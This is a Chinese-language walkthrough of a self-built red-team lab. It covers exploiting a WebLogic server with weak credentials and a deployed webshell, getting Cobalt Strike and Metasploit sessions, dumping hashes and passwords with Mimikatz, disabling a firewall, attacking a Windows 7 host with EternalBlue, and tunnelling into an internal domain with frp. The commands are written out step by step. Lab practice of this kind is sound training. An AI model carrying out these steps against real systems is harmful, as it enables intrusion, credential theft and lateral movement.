声明:本次测试使用的都是自己的服务器,包括公网主机
- !小白、练习中ing
- 有更好的思路欢迎评论
一、靶场环境
<渗透攻击红队>专用内网域渗透靶场<渗透攻击红队> ------------------------------------------------------------------------ 网络环境: 桥接模式 VMnet1-仅主机模式-10.10.10.0/24 VMnet2-仅主机模式-10.10.20.0/24 ------------------------------------------------------------------------ 域控:Windows Server 2008 + IIS + Exchange 2013 邮件服务 目录还原密码:redteam!@#45 主机名:owa 域管理员:administrator:B0bef10a. ------------------------------------------------------------------------ 域内服务器 Mssql:Windows Server 2008 + SQL Server 2008 (被配置了非约束委派) 主机名:sqlserver-2008 本地管理员:Administrator:Admin12345 域账户:redteam\sqlserver:Server12345 (被配置了约束委派) Mssql:sa:sa ------------------------------------------------------------------------ 域内个人 PC:Windows 7 主机名:work-7 本地管理员:john:admin!@#45 域账户:redteam\saul:admin!@#45 ------------------------------------------------------------------------ 单机服务器:Windows server r2 + weblogic 主机名:weblogic 本地管理员:Administrator:Admin12345 weblogic :weblogic:weblogic123(访问 http://152.136.172.12:7001) weblogic 安装目录:C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain(手动运行下 startWebLogic.cmd) ------------------------------------------------------------------------ 其他域用户: 域服务账户:redteam\sqlserver:Server12345 (被配置了约束委派) 邮件用户:redteam\mail:admin!@#45 加域账户:redteam\adduser:Add12345 redteam\saulgoodman:Saul12345 (被配置了非约束委派) redteam\gu:Gu12345 redteam\apt404:Apt12345 ------------------------------------------------------------------------ 本靶场存在的漏洞: GPP:admin:admin!@#45 存在 GPP 漏洞 存在 MS14-068 存在 CVE-2020-1472 Exchange 各种漏洞都可尝试 可尝试非约束委派 可尝试约束委派 存在 CVE-2019-1388 存在 CVE-2019-0708 ... 还有很多漏洞都可尝试
二、其他配置
weblogic主机 开启weblogic服务后,使用frp将 “单机服务器:Windows server r2 + weblogic” 的7001端口映射到公网
三、参考文章
靶场渗透文章 https://www.freebuf.com/articles/web/349557.html https://www.freebuf.com/vuls/356052.html https://www.freebuf.com/vuls/304576.html https://www.freebuf.com/articles/web/305339.html
渗透过程
0x00 前言
!!! 授权目标 http://152.136.172.12:7001 !!! 只授权7001端口
0x01 漏洞扫描
1. 使用fscan对7001端口进行扫描
fscan使用方法: https://github.com/shadow1ng/fscan
命令: fscan64.exe -h 152.136.172.12 -p 7001 输出-片段 -------------------------------------------------- 152.136.172.12:7001 open [*] WebTitle: http://152.136.172.12:7001 code:404 len:1164 title:Error 404--Not Found [+] InfoScan:http://152.136.172.12:7001 [weblogic] [+] http://152.136.172.12:7001 poc-yaml-weblogic-cve-2019-2725 v12 [+] http://152.136.172.12:7001 poc-yaml-weblogic-cve-2020-14750 [+] http://152.136.172.12:7001/console/j_security_check poc-yaml-weblogic-console-weak [{username weblogic} {password weblogic123} {payload UTF-8}] -----------------------------------------------------------
2. 使用Nmap对7001端口扫描,并且获取 (系统/服务版本) 信息
命令: nmap -p 7001 152.136.172.12 -A -T4 输出-片段 -------------------------------------------------- PORT STATE SERVICE VERSION 7001/tcp open http Oracle WebLogic admin httpd 12.1.3.0 (T3 enabled) |_http-title: Error 404--Not Found |_weblogic-t3-info: T3 protocol in use (WebLogic version: 12.1.3.0) -----------------------------------------------------------
3. 从上面的扫描结果中得到的信息
>> weblogic版本: WebLogic version: 12.1.3.0
>> 可能存在的漏洞编号(CVE)
>> weblogic的用户密码 [ weblogic : weblogic123 ]
4. 我们对目标进行weblogic的批量漏洞探测,来获取更多有用信息
使用的脚本: https://github.com/dr0op/WeblogicScan
python WeblogicScan.py 152.136.172.12 7001 -------------------------------------------------------- [*]开始检测 weblogic-console [+]The target Weblogic console address is exposed! [+]The path is: http://152.136.172.12:7001/console/login/LoginForm.jsp [+]Please try weak password blasting! [+]Weblogic后台路径存在 [*]开始检测 SSRF [-]The target Weblogic UDDI module default path does not exist! [*]开始检测 CVE20192725 [-]Target weblogic not detected CVE-2019-2725 [*]开始检测 CVE20192729 [-]Target weblogic not detected CVE-2019-2729 [*]开始检测 CVE201710271 [-]Target weblogic not detected CVE-2017-10271 [*]开始检测 CVE20173506 [+]The target weblogic has a JAVA deserialization vulnerability:CVE-2017-3506 [+]CVE-2017-3506 漏洞存在 [*]开始检测 CVE20192618 [-]口令爆破失败:weblogic/weblogic [-]口令爆破失败:weblogic/weblogic1 [-]口令爆破失败:weblogic/weblogic10 [+]口令爆破成功:weblogic/weblogic123 [+]weblogic服务名: [+]8位随机字符目录:pr1ali [+]CVE-2019-2618 漏洞存在 [*]开始检测 CVE20182894 [+]The target weblogic has a JAVA deserialization vulnerability:CVE-2018-2894 [+]CVE-2018-2894 漏洞存在 [*]开始检测 CVE20182628 [+]The target weblogic has a JAVA deserialization vulnerability:CVE-2018-2628 [+]CVE-2018-2628 漏洞存在 [*]开始检测 CVE20182893 [+]The target weblogic has a JAVA deserialization vulnerability:CVE-2018-2893 [+]CVE-2018-2893 漏洞存在 [*]开始检测 CVE20160638 [+]The target weblogic has a JAVA deserialization vulnerability:CVE-2016-0638 [+]CVE-2016-0638漏洞存在 [*]开始检测 CVE20163510 [-]Target weblogic not detected CVE-2016-3510 [*]开始检测 CVE20173248 [-]Target weblogic not detected CVE-2017-3248
5. 信息汇总
目标: http://152.136.172.12:7001 端口服务: weblogic 可能存在的漏洞: CVE-2017-3506 CVE-2019-2618 控制台: http://152.136.172.12:7001/console/login/LoginForm.jsp 用户密码: weblogic:weblogic123 CVE-2018-2894 CVE-2018-2628 CVE-2018-2893 CVE-2016-0638
0x02 漏洞利用
2.1 姿势一
2.1.1 控制台登陆
参考文章: https://cloud.tencent.com/developer/article/2168631
通过/console/login/LoginForm.jsp和前期收集到的密码登陆控制台
2.1.2 部署 WebShell
1. 通过 哥斯拉 生成jsp的webshell,将shell先压缩成zip包,然后将后缀改成.war;具体见文章: https://cloud.tencent.com/developer/article/2168631
2. 部署成功后shell地址: http://152.136.172.12:7001/shell/shell.jsp
3. 通过Godzilla成功连接到shell,查看当前权限,发现为Administrator用户,很幸运,不需要进一步提权··········编码记得GBK,不然中文显示异常
部署方式2: https://www.freebuf.com/vuls/356052.html
2.2 姿势二
2.2.1 漏洞利用工具检测漏洞
参考文章: https://www.cnblogs.com/backlion/p/15824605.html
为了避免找漏洞编号的麻烦,直接选择ECHO_ALL(有回显),单击检查,这个工具里的编号更新一些,可以结合上面的扫描脚本使用。
2.2.2 可直接执行系统命令
看到当前用户为administrator,配合权限维持中的姿势二上线CS
0x03 权限维持
3.1 姿势一
内网参考文章: https://websec.readthedocs.io/zh/latest/intranet/windows/info.html
3.1.1 查看当前主机的信息
systeminfo -------------------------------------------------------- 主机名: WEBLOGIC OS 名称: Microsoft Windows Server 2012 R2 Datacenter OS 版本: 6.3.9600 暂缺 Build 9600 OS 制造商: Microsoft Corporation OS 配置: 独立服务器 OS 构件类型: Multiprocessor Free 注册的所有人: Windows 用户 注册的组织: 产品 ID: 00253-40020-11623-AA092 初始安装日期: 2021/11/5, 16:39:33 系统启动时间: 2023/3/23, 9:31:57 系统制造商: VMware, Inc. 系统型号: VMware Virtual Platform 网卡: 安装了 2 个 NIC。 [01]: Intel(R) 82574L 千兆网络连接 连接名: Ethernet0 启用 DHCP: 是 DHCP 服务器: 16.12.4.254 IP 地址 [01]: 16.12.4.129 [02]: fe80::c16e:741:e2e:978d [02]: Intel(R) 82574L 千兆网络连接 连接名: Ethernet1 启用 DHCP: 否 IP 地址 [01]: 10.10.20.12 [02]: fe80::8dc1:9737:9185:b10
3.1.2 查看进程,是否存在杀软
tasklist /svc 杀软识别平台: https://www.ddosi.org/av/1.php 映像名称 PID 服务 ========================= ======== ============================================ System Idle Process 0 暂缺 System 4 暂缺 smss.exe 252 暂缺 csrss.exe 328 暂缺 csrss.exe 408 暂缺 wininit.exe 416 暂缺 winlogon.exe 444 暂缺 services.exe 500 暂缺 lsass.exe 508 SamSs svchost.exe 564 BrokerInfrastructure, DcomLaunch, LSM, PlugPlay, Power, SystemEventsBroker svchost.exe 592 RpcEptMapper, RpcSs dwm.exe 680 暂缺 svchost.exe 692 Dhcp, EventLog, lmhosts, Wcmsvc svchost.exe 752 Appinfo, BITS, gpsvc, IKEEXT, iphlpsvc, LanmanServer, ProfSvc, Schedule, SENS, ShellHWDetection, Themes, Winmgmt svchost.exe 804 EventSystem, FontCache, netprofm, nsi svchost.exe 872 CryptSvc, Dnscache, LanmanWorkstation, NlaSvc, WinRM svchost.exe 220 BFE, DPS, MpsSvc spoolsv.exe 860 Spooler svchost.exe 952 TrkWks, UALSVC VGAuthService.exe 280 VGAuthService vm3dservice.exe 1092 vm3dservice vmtoolsd.exe 1124 VMTools vm3dservice.exe 1136 暂缺 svchost.exe 1372 PolicyAgent dllhost.exe 1624 COMSysApp WmiPrvSE.exe 1732 暂缺 msdtc.exe 1824 MSDTC taskhostex.exe 2596 暂缺 explorer.exe 2672 暂缺 ChsIME.exe 2692 暂缺 vmtoolsd.exe 1296 暂缺 jusched.exe 880 暂缺 cmd.exe 2032 暂缺 conhost.exe 2500 暂缺 java.exe 2100 暂缺 cmd.exe 1648 暂缺 conhost.exe 2336 暂缺 frpc.exe 2736 暂缺 jucheck.exe 3696 暂缺 firefox.exe 1424 暂缺 firefox.exe 2588 暂缺 firefox.exe 3112 暂缺 firefox.exe 1772 暂缺 firefox.exe 1868 暂缺 firefox.exe 3728 暂缺 firefox.exe 2856 暂缺 firefox.exe 1180 暂缺 firefox.exe 3540 暂缺 firefox.exe 3692 暂缺 firefox.exe 3620 暂缺 firefox.exe 2412 暂缺 cmd.exe 3716 暂缺 conhost.exe 3128 暂缺 tasklist.exe 3452 暂缺 -------------------------------------------------------- 通过检测,不存在安全软件
通过以上命令获取的信息 不存在域 主机存在双网卡,并且有两个网段 16.12.4.0/24 10.10.10.0/24 当前环境为vmware
3.1.3 上线Cobalt Strike
使用环境: Cobalt Strike(4.7+汉化插件)
1. 开启监听器,生成windows马后通过哥斯拉上传至目录,通过命令行执行程序
2. 成功上线
3. 右击会话,点击提权
4. 成功取得SYSTEM权限
3.2 姿势二
3.2.1 查看当前主机信息
与姿势一的方法一样
3.2.2 查看进程,是否存在杀软
与姿势一的方法一样
3.2.3 使用CS自带 Scripted Web Delivery模块
使用环境: Cobalt Strike(4.7+汉化插件)
A. 选择 攻击->Scripted Web Delivery(S) 模块
B. 设置端口建议使用冷门端口,避免端口被占用,选择一个监听器
C. 提示Poershell Web监听器创建成功,并且给出执行代码
D. 复制代码到漏洞利用工具中执行
E. 查看CS,发现主机上线成功
F. 右击选择提权,选择一个提权漏洞
G. 等待一段时间后上线system权限主机,提权成功
3.3 抓取密码
执行CS的hashdump命令,获取到用户hash值
通过在线解密得到账号密码 https://www.cmd5.com https://www.somd5.com https://md5.cn Administrator : Admin12345
0x04 内网渗透
4.1 基本信息探测
- 为了避免命令执行返回慢,CS先执行个 sleep 1 加加速
- 执行shell ipconfig 查看网卡信息
- 执行 net config workstation 查看是否存在域
- 执行net time /domain 判断是否存在域 ,参考文章: https://blog.csdn.net/qq_44159028/article/details/120823215
信息收集汇总: 1. 当前IP: 10.16.0.44 10.10.20.12 1. IP网段: 10.16.0.0/24 10.10.20.0/24 2. 存在域,但是当前登陆为本地用户
4.1.2 内网主机扫描
4.1.2.1 姿势一
1. CS加载Ladon插件,插件地址: https://github.com/k8gege/Aggressor
2. 使用Ladon 多协议探测存活主机,分别探测上面收集到的两个网段
3. 探测结果如下
由于图1是在物理主机网段,所以就不攻击了
4. 发现 10.10.20.2/24段存在一台主机 10.10.20.7,使用多协议操作系统探测,来获取这个IP的系统信息
5. 这台主机为 Windows 7 SP1版本,并且存在 redteam.red 域
6. 尝试对这台主机进行ms17-010漏洞探测,发现确实存在该漏洞
4.1.2.2 姿势二
1. 上传fscan到目标主机上,分别对16.12.4.0/24和10.10.10.0/24段进行扫描,发现存活主机
fscan -h 16.12.4.0/24 ------------------------------------------------------------------ start infoscan (icmp) Target 16.12.4.2 is alive (icmp) Target 16.12.4.129 is alive (icmp) Target 16.12.4.1 is alive [*] Icmp alive hosts len is: 3 16.12.4.129:7001 open 16.12.4.129:445 open 16.12.4.129:139 open 16.12.4.129:135 open [*] alive ports len is: 4 start vulscan [*] NetInfo: [*]16.12.4.129 [->]weblogic [->]10.10.20.12 [->]16.12.4.129 [->]2002:100c:481::100c:481 [*] NetBios: 16.12.4.129 WORKGROUP\weblogic Windows Server 2012 R2 Datacenter 9600 [03/23 14:48:18] [+] received output: [*] WebTitle: http://16.12.4.129:7001 code:404 len:1164 title:Error 404--Not Found [+] InfoScan:http://16.12.4.129:7001 [weblogic] [+] http://16.12.4.129:7001 poc-yaml-weblogic-cve-2019-2725 v12 [+] http://16.12.4.129:7001 poc-yaml-weblogic-cve-2020-14750 [+] http://16.12.4.129:7001/console/j_security_check poc-yaml-weblogic-console-weak [{username weblogic} {password weblogic123} {payload UTF-8}]
2. 扫描10.10.10.0/24
fscan -h 10.10.10.0/24 ------------------------------------------------------------------ start infoscan (icmp) Target 10.10.20.7 is alive (icmp) Target 10.10.20.1 is alive (icmp) Target 10.10.20.12 is alive [*] Icmp alive hosts len is: 3 10.10.20.12:135 open 10.10.20.7:135 open 10.10.20.12:7001 open 10.10.20.12:445 open 10.10.20.7:445 open 10.10.20.12:139 open 10.10.20.7:139 open [*] alive ports len is: 7 start vulscan [*] NetInfo: [*]10.10.20.12 [->]weblogic [->]10.10.20.12 [->]16.12.4.129 [->]2002:100c:481::100c:481 [*] NetInfo: [*]10.10.20.7 [->]work-7 [->]10.10.20.7 [->]10.10.10.7 [*] NetBios: 10.10.20.12 WORKGROUP\weblogic Windows Server 2012 R2 Datacenter 9600 [+] 10.10.20.7 MS17-010 (Windows 7 Ultimate 7601 Service Pack 1) [03/23 15:03:57] [+] received output: [*] WebTitle: http://10.10.20.12:7001 code:404 len:1164 title:Error 404--Not Found [+] InfoScan:http://10.10.20.12:7001 [weblogic] [+] http://10.10.20.12:7001 poc-yaml-weblogic-cve-2019-2725 v12 [+] http://10.10.20.12:7001/console/j_security_check poc-yaml-weblogic-console-weak [{username weblogic} {password weblogic123} {payload UTF-8}] [+] http://10.10.20.12:7001 poc-yaml-weblogic-cve-2020-14750
3. 扫描结果汇总
发现存活主机 16.12.4.2 (网关) 16.12.4.129 (当前主机) 16.12.4.1 (物理机) # vmware中一般x.x.x.1是物理机;x.x.x.2是网关,所以就不对自己的物理机攻击了,比较浪费时间 ------------------------------------------------------------------ 发现存活主机 10.10.20.7 (Windows 7 Ultimate 7601 Service Pack 1) 10.10.20.1 (物理机) 10.10.20.12 (当前主机) 可能存在的威胁 10.10.20.7 MS17-010 其他信息 10.10.20.7主机上还存在另一个网段10.10.10.0/24
4.2 横向渗透 1
4.2.1. 姿势一
4.2.1.1 搭建隧道出网
这里使用npc搭建,参考文章: https://blog.51cto.com/u_15127612/4543485
搭建隧道地址为: socks5:\\ip:55555 -> 10.10.20.12
4.3.1.2 给MSF设置代理
setg Proxies socks5:ip:55555 # 设置代理 setg ReverseAllowProxy true # 启用代理
4.3.1.3 进行MS17-010探测攻击
1. 探测MSF17-010
// 使用ms17-010检测模块 use scanner/smb/smb_ms17_010 set rhosts 10.10.20.7 // 由于已经使用了socks隧道,所以直接给目标IP就可以了
见ms17-010漏洞百分百存在
2. 使用ms17-010利用模块
use windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp set lport 10001 set rhosts 10.10.20.7
成功拿到shell
3. 输入shell 进入交互界面,查看当前信息
成功拿到 Windows 7 最高权限
4.2.2 姿势二
4.2.2.1 CS与MSF联动
这里使用CS和MSF联动,通过MSF对10.10.20.7发起MSF17-010攻击和上线
1. 在MSF中开启监听
use exploit/multi/handler //使用监听模块 set payload windows/meterpreter/reverse_http //这个payload要跟CS设置的payload保持一致为http协议 set lhost 0.0.0.0 set lport 10000 //端口需要与cs监听器端口保持一致,因为cs后门反弹的8888端口。 -------------------------------------------------- run // 启动监听
2. 在CS上新增监听器 (MSF监听的端口和地址)
3. 选择增加会话
4. 选择MSF监听的地址
5. 等待MSF上线
6. 执行shell进入交互窗口
7. chcp 65001修正乱码
8. 执行ipconfig 查看当前ip,正常显示即可进行下面步骤
4.2.2.2 使用MSF进行内网攻击
1. 内网攻击基础准备
// 让MSF自动添加路由,攻击的时候MSF知道怎么到达内网目标 1. search autoroute 2. use 0 3. set session 1 --------------------------------- 如果同时攻击多个内网,自动添加路由会攻击错误,也可以手动添加 1. sessions -i 会话编号 // 给哪个会话 run autoroute -s
2. 探测MSF17-010
// 使用ms17-010检测模块 use scanner/smb/smb_ms17_010 set rhosts 10.10.20.7 // 由于添加了路由,所以直接设置目标机的ip就可以了
见ms17-010漏洞百分百存在
3. 使用ms17-010利用模块
use windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp set lport 10001 set rhosts 10.10.20.7
成功拿到shell
4. 输入shell 进入交互界面,查看当前信息
成功拿到 Windows 7 最高权限
1. 在 meterpreter> 中执行hashdump 获取账号密码的hash值
2. 没有解密出来密码,有点遗憾,还要收费
4.2.3 MSF上线CS
4.2.3.1 CS上线配置
1. 会话设置监听器
2. 设置listen host为和内网网卡的IP,设置监听端口
3. 生成后门程序,选择lis_10.10.20.1
4.2.3.2 MSF上传CS程序
1. 将beacon.exe通过MSF上传到windwos7中
2. 关闭10.10.20.12的防火墙,避免 widnows 7 无法上线
netsh firewall show config # 查看配置 netsh advfirewall set allprofiles state off # 关闭防火墙
3. 在windows7的 meterpreter> 输入shell进入交互模式
4. 直接执行beacon.exe
5. 等待CS上线
4.2.4 基本信息收集
4.2.4.1 密码服务抓取
使用 Mimikatz 抓取登陆密码
在MSF中执行 meterpreter> creds_all 捕获密码
4.2.4.2 基本信息获取
1. 执行 systeminfo 查看系统信息
主机名: WORK-7 OS 名称: Microsoft Windows 7 旗舰版 OS 版本: 6.1.7601 Service Pack 1 Build 7601 OS 制造商: Microsoft Corporation OS 配置: 成员工作站 OS 构件类型: Multiprocessor Free 注册的所有人: john 注册的组织: 产品 ID: 00426-292-0000007-85916 初始安装日期: 2021/11/5, 17:00:47 系统启动时间: 2023/4/13, 10:31:56 系统制造商: VMware, Inc. 系统型号: VMware Virtual Platform 系统类型: x64-based PC 处理器: 安装了 1 个处理器。 [01]: Intel64 Family 6 Model 158 Stepping 10 GenuineIntel ~2400 Mhz BIOS 版本: Phoenix Technologies LTD 6.00, 2020/11/12 Windows 目录: C:\Windows 系统目录: C:\Windows\system32 启动设备: \Device\HarddiskVolume1 系统区域设置: zh-cn;中文(中国) 输入法区域设置: zh-cn;中文(中国) 时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐 物理内存总量: 2,047 MB 可用的物理内存: 1,495 MB 虚拟内存: 最大值: 4,095 MB 虚拟内存: 可用: 3,518 MB 虚拟内存: 使用中: 577 MB 页面文件位置: C:\pagefile.sys 域: redteam.red 登录服务器: 暂缺 修补程序: 安装了 3 个修补程序。 [01]: KB2534111 [02]: KB2999226 [03]: KB976902 网卡: 安装了 2 个 NIC。 [01]: Intel(R) PRO/1000 MT Network Connection 连接名: 本地连接 启用 DHCP: 否 IP 地址 [01]: 10.10.10.7 [02]: fe80::4502:b75c:67a3:fd84 [02]: Intel(R) PRO/1000 MT Network Connection 连接名: 本地连接 2 启用 DHCP: 否 IP 地址 [01]: 10.10.20.7 [02]: fe80::ecf4:675c:3bd1:e46f
2. 执行 ipconfig /all 查看网卡信息
Windows IP 配置 主机名 . . . . . . . . . . . . . : work-7 主 DNS 后缀 . . . . . . . . . . . : redteam.red 节点类型 . . . . . . . . . . . . : 混合 IP 路由已启用 . . . . . . . . . . : 否 WINS 代理已启用 . . . . . . . . . : 否 DNS 后缀搜索列表 . . . . . . . . : redteam.red 以太网适配器 本地连接 2: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2 物理地址. . . . . . . . . . . . . : 00-0C-29-F4-C8-E4 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 本地链接 IPv6 地址. . . . . . . . : fe80::ecf4:675c:3bd1:e46f%16(首选) IPv4 地址 . . . . . . . . . . . . : 10.10.20.7(首选) 子网掩码 . . . . . . . . . . . . : 255.255.255.0 默认网关. . . . . . . . . . . . . : 10.10.20.1 DHCPv6 IAID . . . . . . . . . . . : 352324649 DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-29-16-A9-45-00-0C-29-55-52-E9 DNS 服务器 . . . . . . . . . . . : 10.10.20.12 TCPIP 上的 NetBIOS . . . . . . . : 已启用 以太网适配器 本地连接: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection 物理地址. . . . . . . . . . . . . : 00-0C-29-F4-C8-DA DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 本地链接 IPv6 地址. . . . . . . . : fe80::4502:b75c:67a3:fd84%11(首选) IPv4 地址 . . . . . . . . . . . . : 10.10.10.7(首选) 子网掩码 . . . . . . . . . . . . : 255.255.255.0 默认网关. . . . . . . . . . . . . : 10.10.10.1 DHCPv6 IAID . . . . . . . . . . . : 234884137 DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-29-16-A9-45-00-0C-29-55-52-E9 DNS 服务器 . . . . . . . . . . . : 10.10.10.8 TCPIP 上的 NetBIOS . . . . . . . : 已启用 隧道适配器 isatap.{28CA7395-A741-4E5A-BC50-6AAB69E7B927}: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 隧道适配器 isatap.{6A2D8ACA-7DC5-49AC-8DF3-95C9F384D974}: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #3 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是啊
3. 执行net time /domain 获取域控信息
\\owa.redteam.red 的当前时间是 2023/4/13 20:17:00 命令成功完成。
4. 通过Ladon插件获取域信息
获取owa.redteam.red 地址为 10.10.10.8
获取域内主机10.10.10.18
基本信息总结
Windows-7(WORK-7) 获取域用户信息 saul:Admin!@#45 //域成员 Administrator:B0bef10a. //域管理员 网卡信息 10.10.10.0/24 10.10.20.0/24 域 owa.redteam.red IP: 10.10.10.8 域内主机 10.10.10.18 SQLSERVER-2008
4.3 横向渗透 2
4.3.1 基本信息探测
1. 查看是否存在杀软 tasklist /svc
映像名称 PID 服务 ========================= ======== ============================================ System Idle Process 0 暂缺 System 4 暂缺 smss.exe 236 暂缺 csrss.exe 324 暂缺 csrss.exe 376 暂缺 wininit.exe 384 暂缺 winlogon.exe 420 暂缺 services.exe 480 暂缺 lsass.exe 488 Netlogon, SamSs lsm.exe 500 暂缺 svchost.exe 588 DcomLaunch, PlugPlay, Power svchost.exe 664 RpcEptMapper, RpcSs svchost.exe 744 AudioSrv, Dhcp, eventlog, lmhosts, wscsvc svchost.exe 792 AudioEndpointBuilder, CscService, Netman, PcaSvc, TrkWks, UxSms svchost.exe 816 Browser, gpsvc, IKEEXT, iphlpsvc, LanmanServer, ProfSvc, Schedule, seclogon, SENS, ShellHWDetection, Themes, Winmgmt, wuauserv svchost.exe 940 EventSystem, netprofm, nsi, sppuinotify, W32Time, WdiServiceHost svchost.exe 100 CryptSvc, Dnscache, LanmanWorkstation, NlaSvc svchost.exe 260 BFE, DPS, MpsSvc svchost.exe 1144 FDResPub, FontCache vm3dservice.exe 1192 vm3dservice vm3dservice.exe 1256 暂缺 svchost.exe 1540 PolicyAgent svchost.exe 1812 WinDefend sppsvc.exe 876 sppsvc SearchIndexer.exe 1780 WSearch taskhost.exe 1704 暂缺 dwm.exe 1468 暂缺 explorer.exe 788 暂缺 cmd.exe 2004 暂缺 conhost.exe 1936 暂缺 beacon.exe 1304 暂缺 rundll32.exe 2288 暂缺 spoolsv.exe 2128 Spooler slui.exe 1112 暂缺 rundll32.exe 2372 暂缺 cmd.exe 2716 暂缺 conhost.exe 2236 暂缺 tasklist.exe 3016 暂缺 WmiPrvSE.exe 1384 暂缺
在goby杀软识别插件中识别,未发现杀软
4.3.2 使用frp创建二层代理 地址: https://github.com/fatedier/frp/releases
1. 上传frps 到 10.10.20.12 主机上
2. 在CS中运行 shell frps.exe 启动,出现以下内容时OK
3. 修改frpc配置后上传到 10.10.20.7 的主机上
4. 在CS中运行shell frpc.exe 启动,出现以下内容时OK
至此二层隧道建立成功,下一步将隧道端口映射到公网使用
1. 修改frpc.ini 后将frpc上传到 10.10.20.12主机上,更多功能手册看github介绍
server_addr 服务器IP server_port 就是frps.ini中的端口 local_port 是10.10.20.7 主机socks5隧道的端口 6000 remote_port 是服务器端映射出去的端口 和上面隧道的原理一样,只不过这里是映射
2. 在服务器端也启动frp,出现以下内容正常,这里是用的是linux版
3. 在10.10.20.12的CS中启动shell frpc.exe ,出现以下内容OK
隧道创建成功
4. 通过浏览器插件连接隧道,插件: https://chrome.google.com/webstore/detail/padekgcemlokbadohgkifijomclgjgif
5. 访问 信息收集到的http://10.10.10.18,访问成功,隧道可用
未完待续...
评论 (0)